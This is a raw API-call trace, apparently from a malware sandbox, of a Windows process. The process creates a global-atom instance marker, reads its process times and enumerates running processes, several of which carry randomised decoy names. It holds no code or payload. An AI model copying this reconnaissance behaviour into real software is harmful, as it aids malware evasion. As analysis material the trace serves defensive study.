	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.136] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.136] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0126.136] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0126.136] GetLastError () returned 0x5
	[0126.136] GetLastError () returned 0x5
	[0126.136] GetLastError () returned 0x5
	[0126.136] GetLastError () returned 0x5
	[0126.136] GetLastError () returned 0x5
	[0126.136] GetLastError () returned 0x5
	[0126.136] GetLastError () returned 0x5
	[0126.136] GetLastError () returned 0x5
	[0126.136] GetLastError () returned 0x5
	[0126.136] GetLastError () returned 0x5
	[0126.136] GetLastError () returned 0x5
	[0126.136] GetLastError () returned 0x5
	[0126.136] GetLastError () returned 0x5
	[0126.136] GetLastError () returned 0x5
	[0126.136] GetLastError () returned 0x5
	[0126.136] GetLastError () returned 0x5
	[0126.136] GetLastError () returned 0x5
	[0126.136] GetLastError () returned 0x5
	[0126.136] GetLastError () returned 0x5
	[0126.136] GetLastError () returned 0x5
	[0126.136] GetLastError () returned 0x5
	[0126.136] GetLastError () returned 0x5
	[0126.136] GetLastError () returned 0x5
	[0126.136] GetLastError () returned 0x5
	[0126.136] GetLastError () returned 0x5
	[0126.136] GetLastError () returned 0x5
	[0126.136] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.137] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetLastError () returned 0x5
	[0126.138] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.138] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0126.139] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.139] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0126.139] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0126.139] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0126.139] CloseHandle (hObject=0x69c) returned 1
	[0126.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0126.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.139] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.139] CloseHandle (hObject=0x69c) returned 1
	[0126.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.140] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.140] CloseHandle (hObject=0x69c) returned 1
	[0126.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.140] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.140] CloseHandle (hObject=0x69c) returned 1
	[0126.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.140] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.140] CloseHandle (hObject=0x69c) returned 1
	[0126.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5b08, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0126.141] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.141] CloseHandle (hObject=0x69c) returned 1
	[0126.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d2a8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16d78) returned 0xc0000004
	[0126.175] VirtualAlloc (lpAddress=0x0, dwSize=0x16e78, flAllocationType=0x3000, flProtect=0x4) returned 0x3c30000
	[0126.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c30000, Length=0x16e78, ResultLength=0x0 | out: SystemInformation=0x3c30000, ResultLength=0x0) returned 0x0
	[0126.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0126.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5970, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0126.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.180] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.180] CloseHandle (hObject=0x69c) returned 1
	[0126.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d4c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.181] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.181] CloseHandle (hObject=0x69c) returned 1
	[0126.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d2a8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0126.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.182] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.182] CloseHandle (hObject=0x69c) returned 1
	[0126.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.182] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.182] CloseHandle (hObject=0x69c) returned 1
	[0126.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.182] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.183] CloseHandle (hObject=0x69c) returned 1
	[0126.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.183] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.183] CloseHandle (hObject=0x69c) returned 1
	[0126.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d248, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.183] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.183] CloseHandle (hObject=0x69c) returned 1
	[0126.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.184] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.184] CloseHandle (hObject=0x69c) returned 1
	[0126.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.184] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.184] CloseHandle (hObject=0x69c) returned 1
	[0126.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.185] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.185] CloseHandle (hObject=0x69c) returned 1
	[0126.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.185] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.185] CloseHandle (hObject=0x69c) returned 1
	[0126.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d428, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.185] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.185] CloseHandle (hObject=0x69c) returned 1
	[0126.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.186] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.186] CloseHandle (hObject=0x69c) returned 1
	[0126.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d368, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0126.186] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.186] CloseHandle (hObject=0x69c) returned 1
	[0126.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0126.187] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.187] CloseHandle (hObject=0x69c) returned 1
	[0126.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d428, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.187] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.187] CloseHandle (hObject=0x69c) returned 1
	[0126.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.187] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.187] CloseHandle (hObject=0x69c) returned 1
	[0126.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.188] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.188] CloseHandle (hObject=0x69c) returned 1
	[0126.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d2c8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.188] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.188] CloseHandle (hObject=0x69c) returned 1
	[0126.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d248, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.188] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.188] CloseHandle (hObject=0x69c) returned 1
	[0126.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.189] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.189] CloseHandle (hObject=0x69c) returned 1
	[0126.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.189] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.189] CloseHandle (hObject=0x69c) returned 1
	[0126.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b97a8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0126.190] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.190] CloseHandle (hObject=0x69c) returned 1
	[0126.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.190] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.190] CloseHandle (hObject=0x69c) returned 1
	[0126.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.190] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.190] CloseHandle (hObject=0x69c) returned 1
	[0126.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d548, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.191] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.191] CloseHandle (hObject=0x69c) returned 1
